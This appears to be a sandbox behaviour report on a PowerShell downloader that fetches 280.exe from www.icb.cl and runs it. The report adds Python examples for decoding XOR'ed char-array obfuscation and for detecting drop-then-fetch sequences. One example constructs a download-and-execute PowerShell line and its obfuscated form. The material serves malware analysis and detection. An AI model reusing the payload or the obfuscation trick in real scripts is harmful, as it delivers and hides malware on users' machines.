File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
Environment Get Environment String name = MshEnableTrace False 1
File Get Info filename = C:\, type = file_attributes True 2
File Get Info filename = C:\Users, type = file_attributes True 2
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 2
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
File Get Info filename = C:\Users, type = file_attributes True 2
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 2
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 3
Environment Get Environment String name = MshEnableTrace False 2
Environment Get Environment String name = HomeDrive, result_out = C: True 1
Environment Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Environment Get Environment String name = MshEnableTrace False 8
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Environment Get Environment String name = MshEnableTrace False 7
File Open filename = STD_INPUT_HANDLE True 1
Environment Get Environment String name = MshEnableTrace False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Environment Get Environment String name = MshEnableTrace False 1
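Everything above is PowerShell engine start-up noise (format files, WSMAN version, event-log source lookups, profile probes). The interesting behaviour sits in worker thread 0xa90 below, which begins by reading the environment variable COmSpeC and gets back the cmd.exe path. The odd casing is deliberate: Windows resolves environment names case-insensitively, and indexing the returned string is a cheap way to spell a cmdlet alias such as iex without those letters appearing in the command line. The same loader family carries its real script as an integer array XOR'ed with a one-byte key and reassembled with [CHAR], which is how process #2 in the overview was launched. The Python below is an added example, not code from the report or from VMRay: the payload text, the key 0x5A and the hostname example.invalid are constructed for the demo; the cmd.exe path is the one the log shows.

```python
"""Decoders for two PowerShell obfuscation constructs used by this loader.

Added example, not code from the report or from VMRay. Thread 0xa90 reads
COmSpeC (mixed case; resolved case-insensitively) and gets the cmd.exe path.
Indexing that string spells a cmdlet alias such as 'iex'; the script body
rides along as an integer array XOR'ed with a one-byte key and rebuilt with
[CHAR]. Payload, key and hostname below are constructed for the demo.
"""
import re

CMD_PATH = r"C:\Windows\system32\cmd.exe"   # result_out of the COmSpeC lookup in the log


def spell_from_env(value, indices):
    """Equivalent of `$env:X[i,j,k] -join ''`: pick characters out of an env value."""
    return "".join(value[i] for i in indices)


def indices_for(value, word):
    """One of several index sets that spell `word` (first occurrence of each letter).
    Many index sets work, so exact indices are a weak detection signature."""
    return [value.index(ch) for ch in word]


def encode_array(plain, key):
    """Produce the loader's integer array: every character XOR'ed with `key`."""
    return [ord(c) ^ key for c in plain]


def decode_array(codes, key):
    """Equivalent of `-join ($codes | % { [CHAR]($_ -bXor $key) })`."""
    return "".join(chr(c ^ key) for c in codes)


def build_fragment(codes, key):
    """Render the array in the shape the loader uses (input for the parser below)."""
    return '-join ((%s) |%%{ [CHAR]($_ -bXor"0x%02x" )} )' % (", ".join(map(str, codes)), key)


FRAGMENT_RE = re.compile(
    r'-join\s*\(\((?P<arr>[\d\s,]+)\)\s*\|\s*%\s*\{\s*\[CHAR\]\(\$_\s*-bXor\s*"?(?P<key>0x[0-9a-fA-F]+|\d+)"?',
    re.IGNORECASE,
)


def parse_fragment(fragment):
    """Pull the integer array and XOR key out of a `-join ((...) |%{[CHAR]($_ -bXor K)})` fragment."""
    m = FRAGMENT_RE.search(fragment)
    if not m:
        raise ValueError("not a -join/-bXor char-array fragment")
    codes = [int(n) for n in re.findall(r"\d+", m.group("arr"))]
    return codes, int(m.group("key"), 0)


PS_TOKENS = ("New-Object", "DownloadFile", "Start-Process", "Invoke-", "$env:", "http")


def recover_key(codes):
    """Brute-force the one-byte key when only the array is available: the right
    key yields all-printable text containing PowerShell tokens; any other key is a
    consistent mis-substitution that breaks every multi-character token."""
    best, best_score = None, -1
    for key in range(256):
        text = decode_array(codes, key)
        if not all(32 <= ord(c) < 127 for c in text):
            continue
        score = sum(text.count(tok) for tok in PS_TOKENS)
        if score > best_score:
            best, best_score = key, score
    return best


# Constructed plaintext and key; example.invalid is a reserved, non-resolving name.
PLAIN = r"$w=New-Object Net.WebClient;$p=$env:temp+'\drop.exe';$w.DownloadFile('http://example.invalid/x/',$p);Start-Process $p"
KEY = 0x5A
CODES = encode_array(PLAIN, KEY)
FRAGMENT = build_fragment(CODES, KEY)

if __name__ == "__main__":
    codes, key = parse_fragment(FRAGMENT)
    print("key 0x%02x ->" % key, decode_array(codes, key))
    print("recovered without the fragment: 0x%02x" % recover_key(codes))
    print("cmd.exe path spells:", spell_from_env(CMD_PATH, indices_for(CMD_PATH, "iex")))
```

Two points worth taking from this: a signature on specific indices or on a specific XOR key is brittle, since any index set that spells the alias and any key value work equally well for the attacker, while the env lookup itself (an oddly cased ComSpec read by powershell.exe, as in the row below) and a long integer array piped through [CHAR] are stable features; and the key is recoverable from the array alone, so a truncated command line in a SIEM still decodes.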
Thread 0xa34
12 6
Category Operation Information Success Count
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Socket Close type = SOCK_STREAM True 1
Inet Close Session - True 1
Socket Close type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
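Thread 0xa90, which follows, is the part of this log worth writing detection around. In order: powershell.exe reads temp, opens 280.exe under that directory for writing, resolves comprealm.net, closes its sockets, deletes and recreates 280.exe, resolves www.icb.cl, reports a failed connect to 190.196.2.210:80, then sends 68 bytes and issues GET /ZxavoDe/ through WinHTTP. That is a drop-then-fetch downloader with a fallback host list. The script below is an added example, not VMRay code: it parses rows in the flattened "Category Operation Information Success Count" form used on this page and flags that sequence. The sample rows are copied from the thread below (plus two benign start-up rows as negatives); the rule itself, the path-under-temp check and the field names it keys on are my own choices, not a VMRay VTI.

```python
"""Triage of flattened VMRay 'Sequential Behavior' rows for a drop-then-fetch pattern.

Added example, not part of the VMRay report. Rows have the shape

    <Category> <Operation> <key = value, key = value, ...> <True|False> <Count>

The rule below (my own, not a VMRay VTI) fires when a process reads the 'temp'
environment variable, opens a .exe under that directory for writing, and
afterwards resolves hostnames or sends HTTP requests. Sample rows are copied
from thread 0xa90 of this report.
"""
import re
from dataclasses import dataclass, field

ROW_RE = re.compile(
    r"^(?P<head>\S+(?: \S+)*?)\s+(?P<info>\w+ = .*?|-)\s+(?P<ok>True|False)\s+(?P<count>\d+)$"
)
# Values may themselves contain ", " (flag lists, HTTP headers), so split only
# at ", <key> = " boundaries.
KV_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")


@dataclass
class Event:
    category: str
    operation: str
    fields: dict
    success: bool
    count: int


def parse_row(line):
    """Split one flattened row into its columns; return None for non-rows."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    category, operation = m.group("head").split(" ", 1)
    info = m.group("info")
    fields = {} if info == "-" else dict(KV_RE.findall(info))
    return Event(category, operation, fields, m.group("ok") == "True", int(m.group("count")))


@dataclass
class Finding:
    temp_dir: str = ""
    dropped: list = field(default_factory=list)      # .exe paths opened for write under %temp%
    deleted: list = field(default_factory=list)      # same paths deleted again (retry on failure)
    hosts: list = field(default_factory=list)        # DNS lookups after the drop
    urls: list = field(default_factory=list)         # HTTP requests after the drop
    failed_connects: list = field(default_factory=list)

    @property
    def is_downloader(self):
        return bool(self.dropped and (self.hosts or self.urls))


def triage(lines):
    """Run the drop-then-fetch rule over rows in log order."""
    f = Finding()
    for line in lines:
        ev = parse_row(line)
        if ev is None:
            continue
        if ev.category == "Environment" and ev.fields.get("name", "").lower() == "temp":
            f.temp_dir = ev.fields.get("result_out", "").lower()
        elif ev.category == "File" and ev.operation == "Create":
            path = ev.fields.get("filename", "")
            in_temp = bool(f.temp_dir) and path.lower().startswith(f.temp_dir + "\\")
            writable = "GENERIC_WRITE" in ev.fields.get("desired_access", "")
            if in_temp and writable and path.lower().endswith(".exe"):
                f.dropped.append(path)
        elif ev.category == "File" and ev.operation == "Delete" and ev.fields.get("filename") in f.dropped:
            f.deleted.append(ev.fields["filename"])
        elif f.dropped and ev.category == "DNS" and ev.operation == "Resolve Name":
            f.hosts.append(ev.fields["host"])
        elif f.dropped and ev.category == "Inet" and ev.operation == "Send HTTP Request":
            f.urls.append(ev.fields["url"])
        elif f.dropped and ev.category == "Socket" and ev.operation == "Connect" and not ev.success:
            f.failed_connects.append((ev.fields["remote_address"], int(ev.fields["remote_port"])))
    return f


# Rows copied from thread 0xa90 of this report (first and third rows are benign negatives).
SAMPLE_ROWS = r"""
Environment Get Environment String name = MshEnableTrace False 21
Environment Get Environment String name = temp, result_out = C:\Users\kFT6uTQW\AppData\Local\Temp True 2
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
DNS Resolve Name host = comprealm.net, address_out = 184.168.46.18 True 1
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe True 1
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
DNS Resolve Name host = www.icb.cl, address_out = 190.196.2.210 True 1
Socket Connect remote_address = 190.196.2.210, remote_port = 80 False 1
Inet Close Session - True 1
Inet Send HTTP Request headers = host: www.icb.cl, connection: Keep-Alive, url = www.icb.cl/ZxavoDe/ True 1
""".strip().splitlines()

if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print("downloader" if result.is_downloader else "clean", result)
```

The delete-and-recreate of the same .exe between two DNS lookups is the retry loop of a multi-URL downloader and is a better sequence feature than any single hostname; the hosts, IPs and URL path in the rows are the indicators to block, but they rotate per campaign.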
Thread 0xa90
153 77
Category Operation Information Success Count
Environment Get Environment String name = MshEnableTrace False 21
Environment Get Environment String name = COmSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Environment Get Environment String name = MshEnableTrace False 2
Environment Get Environment String name = temp, result_out = C:\Users\kFT6uTQW\AppData\Local\Temp True 2
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6 [data captured]
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 True 1 [data captured]
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 1
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config, type = file_attributes False 2
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_type True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
System Get Computer Name result_out = XABNCPUWKW True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2 [data captured]
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Module Map process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
System Get Info type = Operating System True 2
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking False 1
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Mutex Create mutex_name = Global\.net clr networking True 1
Mutex Release mutex_name = Global\.net clr networking True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
DNS Resolve Name host = comprealm.net, address_out = 184.168.46.18 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Socket Close type = SOCK_STREAM True 1
Socket Close type = SOCK_STREAM True 1
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe True 1
Environment Get Environment String name = MshEnableTrace False 1
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_type True 2
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
DNS Resolve Name host = www.icb.cl, address_out = 190.196.2.210 True 1
Socket Connect remote_address = 190.196.2.210, remote_port = 80 False 1
Socket Close type = SOCK_STREAM True 1
Socket Send flags = NO_FLAG_SET, size = 68, size_out = 68 True 1 [data captured]
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Inet Open Connection protocol = http, server_name = www.icb.cl, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /ZxavoDe/ True 1
Inet Send HTTP Request headers = host: www.icb.cl, connection: Keep-Alive, url = www.icb.cl/ZxavoDe/ True 1 [data captured]
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1 [data captured]
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4616 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 4616 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4268 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7260 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4616 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7260 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 5808 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 5808 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5136 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 64736, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 64736, size_out = 2904 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 61832, size_out = 23608 True 1
Fn
Data
Inet Read Response size = 61832, size_out = 23608 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 21484 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 38224, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 38224, size_out = 2920 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 35304, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 35304, size_out = 2920 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 32384, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 32384, size_out = 2920 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 29464, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 29464, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 28012, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 28012, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 26544, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 26544, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 25092, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 25092, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 23624, size_out = 7292 True 1
Fn
Data
Inet Read Response size = 23624, size_out = 7292 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5508 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 16332, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 16332, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 14864, size_out = 7292 True 1
Fn
Data
Inet Read Response size = 14864, size_out = 7292 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4664 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 7572, size_out = 5840 True 1
Fn
Data
Inet Read Response size = 7572, size_out = 5840 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5840 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1732, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 1732, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 264, size_out = 264 True 1
Fn
Data
Inet Read Response size = 264, size_out = 264 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 1732 True 1
Fn
Data
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_attributes True 3
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
Fn
Process Get Info type = PROCESS_BASIC_INFORMATION True 1
Fn
Thread 0xb3c
1 0
Category Operation Information Success Count Logfile
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, show_window = SW_SHOWNORMAL True 1 Fn
Process #3: 280.exe
348 0
Information Value
ID #3
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:15, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:53
OS Process Information
Information Value
PID 0xb40
Parent PID 0xa08 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB44
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
